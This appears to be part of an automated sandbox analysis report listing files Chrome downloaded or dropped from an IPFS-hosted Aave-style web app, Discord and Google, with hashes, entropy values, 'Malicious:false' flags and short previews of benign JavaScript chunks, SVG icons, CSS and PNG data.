                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9671],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=a},89722:function(e,r,t){t.d(r,{Z:function(){return A}});var n=t(87462),o=t(63366),s=t(67294),a=t(86010),i=t(94780),l=t(81719),c=t(78884),u=t(36622),d=t(34867);function v(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=t(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):856
                                                                                                                                                                                                                                                  Entropy (8bit):4.812241925125052
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tu1F4fZb+mw6jmwoTHbASOgo5+TUoEyUv:0i+SSASO4v+v
                                                                                                                                                                                                                                                  MD5:6B541CC9F994BD676B0D839B4CB858C7
                                                                                                                                                                                                                                                  SHA1:6F9F9268B497A8B202C8CB3A643171CD81CA4CD1
                                                                                                                                                                                                                                                  SHA-256:359229EC1AF95BD4436F9FDF2E73CF496012245C217B4B9C156FB486AC1F974B
                                                                                                                                                                                                                                                  SHA-512:046064CD0EB75F4253922D81E683206F6CD812A9598C60DBF686784518802EAC4D53D243E5BA810A36FF31775B20336FCC2C59E170D8A0AA98D7BF2AC87ED17B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/tokens/gho.svg
                                                                                                                                                                                                                                                  Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 300 300"><defs><style>.cls-2{stroke-width:0;fill:#fff}</style></defs><circle cx="150" cy="150" r="150" style="stroke-width:0;fill:#28d358"/><path class="cls-2" d="M94.84 130.42c0 13.49 10.93 24.42 24.42 24.42s24.42-10.93 24.42-24.42S132.75 106 119.26 106s-24.42 10.93-24.42 24.42Zm61.55 0c0 13.49 10.93 24.42 24.42 24.42s24.42-10.93 24.42-24.42S194.3 106 180.81 106s-24.42 10.93-24.42 24.42Z"/><path class="cls-2" d="M265.73 245.44v-83.23h-31.4c-6.35 41.98-40.98 72.56-84.33 72.56-47.9 0-86.17-37.33-86.17-86.14s38.27-86.84 86.18-86.84c41.76 0 76.18 28.91 84.34 68.65h31.4c-8.59-56.5-57.89-99.77-115.75-99.77-63.93 0-115.75 52.82-115.75 117.95S86.07 266.57 150 266.57c40.23 0 68.28-18.63 85.49-47.97.41.12.83.21 1.22.33v53.48a150.426 150.426 0 0 0 29.02-26.98Z"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):304311
                                                                                                                                                                                                                                                  Entropy (8bit):5.593591529252644
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:6/4jmjvNOTspdESuhK6uIB2FcIF9Cia1F:iWOOTspdEXhK5IB2FcIF9P0F
                                                                                                                                                                                                                                                  MD5:42AAA57C0704E5D97327AF6F8D0CDC49
                                                                                                                                                                                                                                                  SHA1:3B956D02384A6080489BA34995F5EC4101DB2155
                                                                                                                                                                                                                                                  SHA-256:F1180446B881D08E9075F7EAB29AFE1E8FDA1591DAC1BFDE09A9C4E6EE4ACA55
                                                                                                                                                                                                                                                  SHA-512:58AD8358FC45982BB1ADDBFEB37137B818846402CA2BABC537ED2F86451AA763772114D7E75A946C8655598457EDF9C4F4054B2C6E6F1B1DCBE7C2F75BF650EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8806.6223602df2ea965f.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{25563:function(e,s,o){"use strict";o.d(s,{hu:function(){return k},gO:function(){return R},tF:function(){return U}});var a=o(59499),n=o(49501),d=o(61782),t=o(30120),c=o(72389),i=o(62097),r=o(61225),m=o(82334),b=o(81645),l=o(29630),g=o(31538),A=o(61702),f=o(67294),x=o(78371),h=o(57609),C=o(46930),F=o(63206),D=o(34637),E=o(59379),I=o(85893);function p(e,s){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);s&&(a=a.filter((function(s){return Object.getOwnPropertyDescriptor(e,s).enumerable}))),o.push.apply(o,a)}return o}function u(e){for(var s=1;s<arguments.length;s++){var o=null!=arguments[s]?arguments[s]:{};s%2?p(Object(o),!0).forEach((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):p(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}var B,k=functio
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18134)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):18183
                                                                                                                                                                                                                                                  Entropy (8bit):5.745314379390206
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:M7Qek/HNfVFGOSH4vgk+l/HyHOC7CmA5h4m4C2xYtL5c29Jd0KkBijYpthFDv2Pl:gQek/7VwEgkK/SuC7Cx5G1C2xYtL5c2b
                                                                                                                                                                                                                                                  MD5:0484A49ECB98E68AC141261F03571012
                                                                                                                                                                                                                                                  SHA1:BD0FE8929907033D0E0C51485389EFEC3C911975
                                                                                                                                                                                                                                                  SHA-256:0F3FF527630775D2733027371E91F7E0DF45917014FF42E26BD1556694A01987
                                                                                                                                                                                                                                                  SHA-512:22B68BEEABC680C32EC491A58A46754E36A5CB6ED5A9C90F23EE4870EC7570D5F44DE43A9B377C0909B0665005D6A5283A928235AA5A9311126DE13C4BC91F7A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/30e761b4e93a24b607b9.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10778"],{418757:function(e){e.exports="/assets/b7d1dc6b0746101719c5.png"},494207:function(e){e.exports="/assets/85153fe71873da0f5802.svg"},320440:function(e){e.exports="/assets/4676f063fb9f129e9fdb.svg"},561030:function(e){e.exports="/assets/75c80c4160a66983ae66.svg"},419185:function(e){e.exports="/assets/47e72e6360ce185adab6.svg"},826806:function(e){e.exports="/assets/fb418059f41b569abca4.svg"},123013:function(e){e.exports="/assets/98cacc492d985565ed4f.png"},540909:function(e){e.exports="/assets/2a5176cf2bd0ccdf0e7b.svg"},232454:function(e){e.exports="/assets/ad2027f11792ba8c0e7f.svg"},526916:function(e){e.exports="/assets/f38b6aefa24dc9a54765.svg"},29654:function(e){e.exports="/assets/dde11474b0623b723861.svg"},820160:function(e,s,a){a.d(s,{Z:function(){return L}});var E=a(735250);a(470079);var _=a(481060),t=a(813197),n=a(689938),r=a(510186);function L(e){let{icon:s,onChange:a}=e;return(0,E.jsx)(_.Fo
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAm17C8ASVPKjBIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                                  Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                                                  Entropy (8bit):5.114377432261608
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tcGcAumc4slmyHSORZQqFbxTmSqgBqDc4:tcGtuIyHjRZQq5sLgBqA4
                                                                                                                                                                                                                                                  MD5:CF35F935EE29ECDC14E56FAD3F87DF16
                                                                                                                                                                                                                                                  SHA1:6EE303DF7BA5468930E37DA8C09E6CBCC3CC9748
                                                                                                                                                                                                                                                  SHA-256:6CF85DA54D4C554DA07B2AEC6F0DF29603D8D28A102ED4E17DCE99A7D7D79B9A
                                                                                                                                                                                                                                                  SHA-512:EC1F0F369B42BEB670B253CFD5AD9D4C15C2DBED08C8804B2C73F19DEE0C561F2EF19D245EDFD999D6166699E04A94D72A8260BD33AD3FEBE699B14EE31889AA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):3146
                                                                                                                                                                                                                                                  Entropy (8bit):4.484082045212369
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                                                                                                                                                                                                  MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                                                                                                                                                                                                  SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                                                                                                                                                                                                  SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                                                                                                                                                                                                  SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/ba88bbd1342d3f000e33.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (42515), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):42515
                                                                                                                                                                                                                                                  Entropy (8bit):5.483805581313712
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ppvgSTvX3mX/KNzv56gXDxJXtRiWKTy7AaeDV5rfhDdXCj6XA1H2:bB/E/SzRRpxFk
                                                                                                                                                                                                                                                  MD5:24FC5DDCE0BFBBB1BF945323B4DB7B34
                                                                                                                                                                                                                                                  SHA1:7418B8D62936AFC0AD60A1100BC74195CA51AB68
                                                                                                                                                                                                                                                  SHA-256:11C883C8B1E32A809BDCF7A3001C077B6280127EC3878DDA23ECC726E42A82F1
                                                                                                                                                                                                                                                  SHA-512:119BD76CFEFA0418D5481245A29458164E14B88E71533A605ECB544F32A5643CCF22E8D32475F9F1FF05BF83B8303BBEDE9C1CBD15F4A7EC33D88A1693F48990
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/8977.8cefff53c53bdda4.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{75158:function(e,r,t){t.d(r,{Z:function(){return k}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),h=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),f=t(36622),v=t(78884),x=t(81719),y=t(34867);function g(e){return(0,y.Z)("MuiCheckbox",e)}var b=(0,t(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const A=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16561867
                                                                                                                                                                                                                                                  Entropy (8bit):5.8125885301397435
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:393216:Ac60nOOpgxw0Grvo5sdhNNWiZH+lKxSrHii3qcaWLxSkHsKBIV+ztWQ:crpB8+zF
                                                                                                                                                                                                                                                  MD5:BEF713E90728AA2AF9B9FD1CDE3D9D02
                                                                                                                                                                                                                                                  SHA1:42EC2FC039E559A8ED734582BD273328BB82502F
                                                                                                                                                                                                                                                  SHA-256:2EA19AF0D211F1AE5047DAB2F796B55E3433FD58B3B1EF33CD5C02F774FB2CF7
                                                                                                                                                                                                                                                  SHA-512:A632C16CBC7E515437A9268710AB7D3154558FBFA9B54C14E7EFFD0C86985A7358C42A2FAAA1055A0A2B2365913DB63981D1E34C91DBE18939B54D5D2D6A3005
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(()=>{var __webpack_modules__={385007:function(e,t,n){var r={"./de.jsona":["644753","30244"],"./zh-CN.jsona":["494062","56446"],"./da.jsona":["44867","57387"],"./el.jsona":["581144","55601"],"./tr.jsona":["146878","84385"],"./es-ES.jsona":["872550","45747"],"./hr.jsona":["403530","29924"],"./cs.jsona":["753771","87233"],"./fi.jsona":["554545","7402"],"./es-419.jsona":["39227","59729"],"./ja.jsona":["588688","7728"],"./pt-BR.jsona":["246297","394"],"./ro.jsona":["37190","53269"],"./sv-SE.jsona":["335417","11193"],"./ru.jsona":["809464","12611"],"./vi.jsona":["139107","45576"],"./id.jsona":["492248","77800"],"./it.jsona":["515630","78670"],"./uk.jsona":["167111","58548"],"./lt.jsona":["877749","44754"],"./pl.jsona":["477384","60878"],"./hu.jsona":["107425","98570"],"./nl.jsona":["432763","41588"],"./th.jsona":["182260","49827"],"./bg.jsona":["251927","20575"],"./fr.jsona":["570173","99450"],"./zh-TW.jsona":["592369","30684"],"./hi.jsona":["629869","22732"],"./en-GB.jsona":["569249","9933
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4686), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4686
                                                                                                                                                                                                                                                  Entropy (8bit):5.06794409717879
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:sDmAXyeGteFczN6XddIVEQEcXkEbES0uyY4XvrkXH5WXWvmADjXxaNpXAXoA6YVU:rkZioSYKhvUh1N
                                                                                                                                                                                                                                                  MD5:C8E16A308589793B691E74FDDABD6B8F
                                                                                                                                                                                                                                                  SHA1:1A19589D5697F3BA841CC6333956994641FD3E21
                                                                                                                                                                                                                                                  SHA-256:92AC60B8AF9746D7879D1F83134F29B01AFFE1A17CBA1ED26AA9C2E085529AE7
                                                                                                                                                                                                                                                  SHA-512:84BD84090B33C6A01D443E55486106E0F57ED23E8581EAC6BA7E009B0E19982782FCF7E1A9F30EFF105F946B6F45476DE7702DF2D190609B9B7625857B9616D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Preview:@font-face{font-family:Inter;font-style:normal;font-weight:100;font-display:swap;src:url(/_next/static/media/Inter-Thin.dafaa44d.woff2) format("woff2"),url(/_next/static/media/Inter-Thin.16325d9b.woff) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:100;font-display:swap;src:url(/_next/static/media/Inter-ThinItalic.4fc662b3.woff2) format("woff2"),url(/_next/static/media/Inter-ThinItalic.d3d89947.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:200;font-display:swap;src:url(/_next/static/media/Inter-ExtraLight.6824177d.woff2) format("woff2"),url(/_next/static/media/Inter-ExtraLight.15c082a5.woff) format("woff")}@font-face{font-family:Inter;font-style:italic;font-weight:200;font-display:swap;src:url(/_next/static/media/Inter-ExtraLightItalic.05138ddd.woff2) format("woff2"),url(/_next/static/media/Inter-ExtraLightItalic.3beee54f.woff) format("woff")}@font-face{font-family:Inter;font-style:normal;font-weight:300;font-display:swap;src
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1831
                                                                                                                                                                                                                                                  Entropy (8bit):4.961280765891291
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:wEQL+HXOVdDz2NHTFGx/HeqU0ez8y2WbDLghwwK6DN:/mDy1BKH5U0eIC/LgXR
                                                                                                                                                                                                                                                  MD5:3A513F9FC38F1826D1F8B8513DD83847
                                                                                                                                                                                                                                                  SHA1:DBC025A187CC8C23778DE3CE0DAD0AA2F1CC2B68
                                                                                                                                                                                                                                                  SHA-256:CE2542556C9EB1A4375266128CEF15396087A58B803F2083839BE6FC87C67900
                                                                                                                                                                                                                                                  SHA-512:76D267E553DFAC48DDFD064A40E516E1DC9D641AC77005186DE2348CF3CB52D92A0D0E94E7C9FBC28B585CC04C2462E79C6C43B8CB86B751C2E0646824BA541B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/aave.svg
                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="800" height="800"><defs><linearGradient id="b" x1=".907" y1=".227" x2=".163" y2=".853" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#b6509e"/><stop offset="1" stop-color="#2ebac6"/></linearGradient><clipPath id="a"><path d="M0 0h800v800H0z"/></clipPath><filter id="c" x="251.25" y="182.25" width="298.205" height="434.66" filterUnits="userSpaceOnUse"><feOffset/><feGaussianBlur stdDeviation=".25" result="c"/><feFlood flood-opacity=".161"/><feComposite operator="in" in2="c"/><feComposite in="SourceGraphic"/></filter></defs><g clip-path="url(#a)"><circle cx="388" cy="388" r="388" transform="translate(12 12)" fill="url(#b)"/><g filter="url(#c)"><path d="M531.775 616.161A16.493 16.493 0 0 1 515.3 599.69v-47.959a16.453 16.453 0 1 0-32.907 0v22.76a16.453 16.453 0 0 1-32.907 0v-22.76a16.458 16.458 0 1 0-32.915 0v6.194a16.471 16.471 0 0 1-32.941 0v-6.194a16.458 16.458 0 1 0-32.915 0v22.76a16.453 16.453 0 0 1-32.907 0v-22.76a16.453 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                                                                  Entropy (8bit):7.762903038973767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:u6Wak8tPjYJtY1B65ugx6c1Pm4ZestyoQlLNlbwflO2QHuWT8wj+U:7HrYJt40xu4croQlLNlr2vPJU
                                                                                                                                                                                                                                                  MD5:68C9C2A88E45178139F66A748A39272F
                                                                                                                                                                                                                                                  SHA1:252E29BBE84BEE5B977FBCB36D8881A0D902F11F
                                                                                                                                                                                                                                                  SHA-256:AA94366A2BE71C76622A011FFE33FC59A9275FACC8BED3B7F257D9FFF5326FE2
                                                                                                                                                                                                                                                  SHA-512:6EA3D92426841D1FFFC229D4DD7C62951955C551A4685E9560B07B41447A285ED0120CC7B8C5FB0C420BF00A3C4202F0626469E32FDC199EBB90C5A39E284DFD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... ...........HIDATx.4...@....X.m.....l.[.p.D+ ^.RE*.'s92.!Ji...kq....#.N............s.s.o....v0....p......>}.'\~.dGZr@...l.....x.N.i.(pG..3...r......c.........I8..q....9.....;~....+O...#.m.m.....{m...v&....2Qg^...../uo....W...O........r..~...5...~....$oM)W.r....b.:..{..."...ou...z....I..V.....94.SB..S...2.GY..l*..81..#.W....).p........O.3..y.k.C[.W.....b.....(...d...}\..>c.1....~.|.'.Sb.B..j...+...}r.+..Q.=....D#/...y.d..J.A._.H.9z.L.8.....y.6b.K|_YR........U....rL........"..C"N...b.........n.&.`......7.X..+.J.B.U...T..R...mC..?...g.8.;....o.R...,g_.M....P.E..h..`.O......8J........Z.=.5...N..X.4.sn..Z.7...=y....A.5....+...5.3.O...n.;.N~.s......-.vg.d...nm..Q...\.7Z...gc..J.?.A.9.......u|...!....J.1..|...W..AtcK......t.h.|`v..9...T.....N.<G7..`...od.>..Y.|P8LV...p..#k..k..oh...#7.|p....A.).].%8S.3.5..5......wT3.v.@.5....&.R...y......s.ph.. .x.|U.cb..>,....sty.......8......_....~..f...}.]..a..Q...6..:.J ....
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):135526
                                                                                                                                                                                                                                                  Entropy (8bit):5.3741924520452145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:Qor/gvCRzpAUDZxnwdKPHOWaCHMRGyfpQ1WSK2mg335x+Jk9rLkSYRDeB/P30MSF:t/gvCvbwoOWaCHMLRWkRjMeA2
                                                                                                                                                                                                                                                  MD5:C6375E6BEF51D42031BFC33337AAF902
                                                                                                                                                                                                                                                  SHA1:BBC5DD641026C865B9EC5EA5DE60B937E8E11F78
                                                                                                                                                                                                                                                  SHA-256:7767BE997BDEA366C3C547D068A0D911530839362AC09A4D95EEEEAB62A05EA7
                                                                                                                                                                                                                                                  SHA-512:262EEE415E939C2ACB0269ECC146E92A723B398F3E19A2880D8E564EFF91B081E7DA1BD746358B97F95D4B76F1CEF21B81D6313F208715A3DD454E92D1083F3C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.loaded=!0,r.exports}return i.m=e,i.c=t,i.p="",i(0)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(1),r=i(3),n=i(8),a=i(15);function o(e,t,i){var a=null,o=function(e,t){i&&i(e,t),a&&a.visit(e,t)},u="function"===typeof i?o:null,h=!1;if(t){h="boolean"===typeof t.comment&&t.comment;var c="boolean"===typeof t.attachComment&&t.attachComment;(h||c)&&((a=new s.CommentHandler).attach=c,t.comment=!0,u=o)}var l,p=!1;t&&"string"===typeof t.sourceType&&(p="module"===t.sourceType),l=t&&"boolean"===typeof t.jsx&&t.jsx?new r.JSXParser(e,t,u):new n.Parser(e,t,u);var d=p?l.parseModule():l.parseScript();return h&&a&&(d.comments=a.comments),l.config.tokens&&(d.tokens=l.tokens),l.config.tolerant&&(d.errors=l.errorHan
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4768), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4768
                                                                                                                                                                                                                                                  Entropy (8bit):5.531953924670438
                                                                                                                                                                                                                                                  Encrypted:false
